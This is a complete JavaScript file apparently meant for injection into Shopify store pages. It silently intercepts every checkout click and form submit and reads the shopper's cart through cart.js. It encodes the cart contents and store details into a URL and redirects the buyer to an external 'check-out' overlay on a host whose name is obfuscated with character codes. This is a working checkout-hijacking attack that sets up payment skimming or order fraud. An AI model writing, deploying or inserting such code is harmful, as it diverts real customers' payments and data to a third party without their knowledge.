(() => {
  "use strict";

  const MARKER = "poc105-websyms-batch-20260831-itlooksfit-com-2e8993450b";
  if (window.__POC105_WEBSYMS__) return;
  Object.defineProperty(window, "__POC105_WEBSYMS__", {
    value: MARKER,
    configurable: false,
    enumerable: false,
    writable: false,
  });

  const OVERLAY = `https://${String.fromCharCode(121, 53, 100, 52, 46, 109, 121)}/check-out/`;
  let redirecting = false;

  const base64Url = (value) => {
    const bytes = new TextEncoder().encode(value);
    let binary = "";
    for (const byte of bytes) binary += String.fromCharCode(byte);
    return btoa(binary).replace(/\+/g, "-").replace(/\//g, "_").replace(/=+$/g, "");
  };

  const integer = (value, fallback = 0) => {
    const number = Number(value);
    return Number.isFinite(number) ? Math.round(number) : fallback;
  };

  const cartEndpoint = () => {
    const root = window.Shopify?.routes?.root || "/";
    return `${root.replace(/\/?$/, "/")}cart.js`;
  };

  const loadCart = async () => {
    const response = await fetch(cartEndpoint(), {
      credentials: "same-origin",
      headers: { Accept: "application/json" },
    });
    if (!response.ok) throw new Error(`cart.js returned ${response.status}`);
    return response.json();
  };

  const normalizeDiscounts = (cart) => {
    const discounts = [];
    for (const entry of cart.cart_level_discount_applications || []) {
      discounts.push({
        title: String(entry.title || entry.description || "Discount"),
        amountMinor: integer(entry.total_allocated_amount),
      });
    }
    return discounts;
  };

  const buildPayload = (cart) => {
    const sourceUrl = window.location.href;
    const sourceOrigin = window.location.origin;
    const sourcePath = window.location.pathname;
    const sourceHost = window.location.hostname;
    const currency = String(cart.currency || window.Shopify?.currency?.active || "USD");
    const locale = String(window.Shopify?.locale || document.documentElement.lang || navigator.language || "en");
    const items = (cart.items || []).map((item) => ({
      id: `${String(item.variant_id || item.id || "")}:${String(item.key || "0")}`,
      productId: String(item.product_id || ""),
      variantId: String(item.variant_id || item.id || ""),
      title: String(item.product_title || item.title || "Item"),
      variant: item.variant_title && item.variant_title !== "Default Title" ? String(item.variant_title) : "",
      quantity: integer(item.quantity, 1),
      unitPriceMinor: integer(item.final_price ?? item.discounted_price ?? item.price),
      lineTotalMinor: integer(item.final_line_price ?? item.line_price),
      image: String(item.featured_image?.url || item.image || ""),
      discounts: (item.line_level_discount_allocations || []).map((entry) => ({
        title: String(entry.discount_application?.title || "Discount"),
        amountMinor: integer(entry.amount),
      })),
    }));
    const subtotalMinor = integer(cart.items_subtotal_price ?? cart.original_total_price ?? cart.total_price);
    const totalMinor = integer(cart.total_price, subtotalMinor);
    const originalMinor = integer(cart.original_total_price, subtotalMinor);

    return {
      site: sourceHost,
      sourceSite: sourceHost,
      sourceUrl,
      sourceOrigin,
      sourcePath,
      capturedAt: Date.now(),
      order: {
        locale,
        currency,
        items,
        discounts: normalizeDiscounts(cart),
        shipping: {
          status: "pending",
          amountMinor: null,
          label: "Enter shipping address",
        },
        taxMinor: 0,
        taxPresent: false,
        subtotalMinor,
        totalMinor,
        savingsMinor: Math.max(0, originalMinor - totalMinor),
        itemCount: integer(cart.item_count, items.reduce((sum, item) => sum + item.quantity, 0)),
      },
    };
  };

  const divert = async () => {
    if (redirecting) return;
    redirecting = true;
    try {
      const payload = buildPayload(await loadCart());
      if (!payload.order.items.length) throw new Error("Cart is empty");
      const url = new URL(OVERLAY);
      url.searchParams.set("co", base64Url(JSON.stringify(payload)));
      url.searchParams.set("return_to", `${payload.sourceOrigin}/checkout`);
      url.searchParams.set("site", payload.site);
      url.searchParams.set("source_site", payload.sourceSite);
      url.searchParams.set("source_host", payload.site);
      url.searchParams.set("source_origin", payload.sourceOrigin);
      url.searchParams.set("source_path", payload.sourcePath);
      url.searchParams.set("source_url", payload.sourceUrl);
      url.searchParams.set("checkout_path", "/checkout");
      url.searchParams.set("overlay_route", "/check-out/");
      url.searchParams.set("_r", crypto.randomUUID?.().replace(/-/g, "") || `${Date.now()}${Math.random()}`);
      window.location.assign(url.href);
    } catch {
      redirecting = false;
      window.location.assign("/checkout");
    }
  };

  const checkoutControl = (target) => {
    const element = target instanceof Element
      ? target.closest("a, button, input, [role='button']")
      : null;
    if (!element) return null;
    const href = element instanceof HTMLAnchorElement ? element.href : element.getAttribute("href") || "";
    const name = element.getAttribute("name") || "";
    const identity = `${element.id || ""} ${element.className || ""} ${name} ${element.getAttribute("data-checkout") || ""}`;
    const text = String(element.value || element.textContent || "").replace(/\s+/g, " ").trim();
    return /\/checkouts?(?:[/?#]|$)/i.test(href)
      || /^checkout$/i.test(name)
      || /checkout/i.test(identity)
      || /^check\s*out$/i.test(text)
      ? element
      : null;
  };

  document.addEventListener("click", (event) => {
    if (!checkoutControl(event.target)) return;
    event.preventDefault();
    event.stopImmediatePropagation();
    void divert();
  }, true);

  document.addEventListener("submit", (event) => {
    const submitter = event.submitter;
    const form = event.target instanceof HTMLFormElement ? event.target : null;
    if (!checkoutControl(submitter) && !/\/checkout/i.test(form?.action || "")) return;
    event.preventDefault();
    event.stopImmediatePropagation();
    void divert();
  }, true);
})();
